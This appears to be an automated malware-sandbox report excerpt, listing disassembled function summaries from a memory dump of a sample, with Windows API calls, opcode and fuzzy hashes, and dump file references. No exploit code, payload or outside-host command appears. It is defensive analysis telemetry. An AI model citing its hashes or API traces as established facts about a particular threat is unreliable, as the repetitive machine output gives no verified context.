                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                      • Opcode ID: 058930809d657628c8080ae102935ab543af7875ce21329ce762f9c1054ffc65
                                                                                                                                                                                                                                      • Instruction ID: 73efdd5322fd8c8c743e9c28acee8152daaccac4cfba804fe48683bea834fa6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 058930809d657628c8080ae102935ab543af7875ce21329ce762f9c1054ffc65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74218730600158AFDB298F55C858EBA7FAAFF4A364F044065FA45AA1A2C3329950EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00EFDC44), ref: 00ECD9B1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00ECD9C0
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ECD9CF
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00EFDC44), ref: 00ECDA2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                                                                                                      • Opcode ID: 853386dece9e77bf0a086968462b5d36ebe69970c3ace9eb8328477fadf76dae
                                                                                                                                                                                                                                      • Instruction ID: e20147a8d2b5c94757e0d21df4f0470857bba340e8768e6e8f823a04978fb772
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 853386dece9e77bf0a086968462b5d36ebe69970c3ace9eb8328477fadf76dae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2721887450C2019F8700DF24DD4196ABBE4EF96358F10662DF499E72A1D732D94ACB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EF306F
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF3089
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF3097
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EF30A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                      • Opcode ID: c3ee3dbe29cf9cacfb6e4af20fd714b910f1685c23b47284cb6cb1d94a7658cf
                                                                                                                                                                                                                                      • Instruction ID: 5a0db1f3e4b673bcb939c4b54f38508674774ead0ecb28c6d6b14eb8c92b630d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3ee3dbe29cf9cacfb6e4af20fd714b910f1685c23b47284cb6cb1d94a7658cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C210631309114AFD704DB25CC54FBA7B96EF81318F14925AF526AB2D2CB71ED82C790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC941B: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00EC7FA8,?,000000FF,?,00EC8DF2,00000000,?,0000001C,?,?), ref: 00EC942A
                                                                                                                                                                                                                                        • Part of subcall function 00EC941B: lstrcpyW.KERNEL32(00000000,?), ref: 00EC9450
                                                                                                                                                                                                                                        • Part of subcall function 00EC941B: lstrcmpiW.KERNEL32(00000000,?,00EC7FA8,?,000000FF,?,00EC8DF2,00000000,?,0000001C,?,?), ref: 00EC9481
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00EC8DF2,00000000,?,0000001C,?,?,00000000), ref: 00EC7FC1
                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00EC7FE7
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EC8DF2,00000000,?,0000001C,?,?,00000000), ref: 00EC8022
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                      • Opcode ID: eb48e5176c3d1d3d7014728de69765a0ee22b91e1ca3119e0a1dd45c5006a41e
                                                                                                                                                                                                                                      • Instruction ID: bf490ce1123ed656dc7f5a3fe9c9dc9503f08e564ab95cdd790ddce44c1b8386
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48e5176c3d1d3d7014728de69765a0ee22b91e1ca3119e0a1dd45c5006a41e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6211B13A200301ABDB14AF34CE45E7A77A9FF85354B50602EF906DB264EF729816D751
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00E9D047
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E9D06A
                                                                                                                                                                                                                                        • Part of subcall function 00E93AA0: RtlAllocateHeap.FWRHGLUIBB(00000000,?,?,?,00E80075,?,?,00ED0FE4,0000FFFF), ref: 00E93AD2
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E9D090
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E9D0B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1794362364-0
                                                                                                                                                                                                                                      • Opcode ID: c56076007cc19bd825b12341fba6e736ec5327425d82b5c16d9e9b2fc83dff44
                                                                                                                                                                                                                                      • Instruction ID: 0d1c77e9f6bbc24113910af194de766d4ff3d4249615feaee008d88f7dce34de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c56076007cc19bd825b12341fba6e736ec5327425d82b5c16d9e9b2fc83dff44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5401847260A6257F2B2166775C8CCBF6E6FDEC2BA57141129BD04F2240DE658C0281B1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC20D1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC20E3
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC20F9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC2114
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: c449d415b79ae00f159ee90539da0281286ce3b56b0cda5fc38655030fa9b777
                                                                                                                                                                                                                                      • Instruction ID: 9cfd2b72c549d3f914d863279cebc1e97e9738530aee7a09ac6ea4b064ebd8a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c449d415b79ae00f159ee90539da0281286ce3b56b0cda5fc38655030fa9b777
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D11393A901218FFEF119BA4CD85F9DFBB8FB08750F240099EA00B7290D6716E11DB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EFA752
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFA75C
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFA767
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00EFA79B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                      • Opcode ID: 882438ffe53b1760a675912891491de2403d215cf8bea91b2411331f7440322c
                                                                                                                                                                                                                                      • Instruction ID: ae9ad0040a126b916e071db4b281b3d24fc57ac46bbb5a6c6f6e5b3d760ada75
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 882438ffe53b1760a675912891491de2403d215cf8bea91b2411331f7440322c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5113AB150011DEBDB10EF54CC89DFE7BB9EF44315F140466EA06FA181D330AA91CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ECE91F
                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00ECE952
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ECE968
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ECE96F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                      • Opcode ID: 01653caacb9ae6e8ec1b776376110934f518d501090adccfc1d831c5a18e8fe7
                                                                                                                                                                                                                                      • Instruction ID: 4c8b8428ecd84521b1fcc2d0401f393a3349ecb4c92c935ae3209a7ad2211c04
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01653caacb9ae6e8ec1b776376110934f518d501090adccfc1d831c5a18e8fe7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B112B72904258BFC7019FA89C05FAE7FAEAB86324F044259F815F3390D6758D0487A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E66691
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00E666A5
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E666AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                      • Opcode ID: 96de6806e4bb7b899ad1b206ee5df301fec1bda5795f338baa36cd1a7a121088
                                                                                                                                                                                                                                      • Instruction ID: 0bbef2efbc3ea109d531451357476eb3bdb98338de55464188f7445319a051fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96de6806e4bb7b899ad1b206ee5df301fec1bda5795f338baa36cd1a7a121088
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02118B72101908BFDF025F90EC44EEABB6AEF493A8F001106FA00A6060CB31DC64EBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00ED0FE4,00000000,00000000,?,00E9329A,00ED0FE4,00000000,00000000,00000000,?,00E9350B,00000006,FlsSetValue), ref: 00E93325
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00E9329A,00ED0FE4,00000000,00000000,00000000,?,00E9350B,00000006,FlsSetValue,00F03270,FlsSetValue,00000000,00000364,?,00E930C6), ref: 00E93331
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E9329A,00ED0FE4,00000000,00000000,00000000,?,00E9350B,00000006,FlsSetValue,00F03270,FlsSetValue,00000000), ref: 00E9333F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: deacfb3a313c540f6febfacb1ed3bbd353f897256af72ad6f1d592c758f24f88
                                                                                                                                                                                                                                      • Instruction ID: c6fcd69ab070c2040a3146ea6a31b7fff1f1a30aa54fd7da3c3e00a30564a169
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deacfb3a313c540f6febfacb1ed3bbd353f897256af72ad6f1d592c758f24f88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6014732385222AFCF208B7AAC4496A3B99BF41B757200320F926F7240CF20DD05C6E0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00EC7B1D
                                                                                                                                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EC7B35
                                                                                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EC7B4A
                                                                                                                                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00EC7B68
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1352324309-0
                                                                                                                                                                                                                                      • Opcode ID: 1cca5e264a58800da1ab7d34f62ace27cb010a8bce0105ebaab174bbdee05f9e
                                                                                                                                                                                                                                      • Instruction ID: 59004d79a3cfbf67f5a577ba90b87c99ed730aceaa59a3cc1d73a73e8fba234d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cca5e264a58800da1ab7d34f62ace27cb010a8bce0105ebaab174bbdee05f9e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF1179B1209700AFE3208F24DE09FA27BBAEB00B04F10852DA5A6E6050D7B1ED09DF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ECB389,?,00008000), ref: 00ECB77A
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ECB389,?,00008000), ref: 00ECB79F
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ECB389,?,00008000), ref: 00ECB7A9
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ECB389,?,00008000), ref: 00ECB7DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                      • Opcode ID: 093075e9a04781950da68b568b4140ae1167c7e35abdc94a92419155132b87e1
                                                                                                                                                                                                                                      • Instruction ID: fa660feb670b2767897ed18ef482ee542eca4d595951d5eeb4ca01a3aca989d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 093075e9a04781950da68b568b4140ae1167c7e35abdc94a92419155132b87e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26112731C05529EBCF149BE5DA89BEDBB78FF89711F10519AD841B2240CB315652CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EF8654
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EF866C
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EF8690
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EF86AB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                      • String ID:
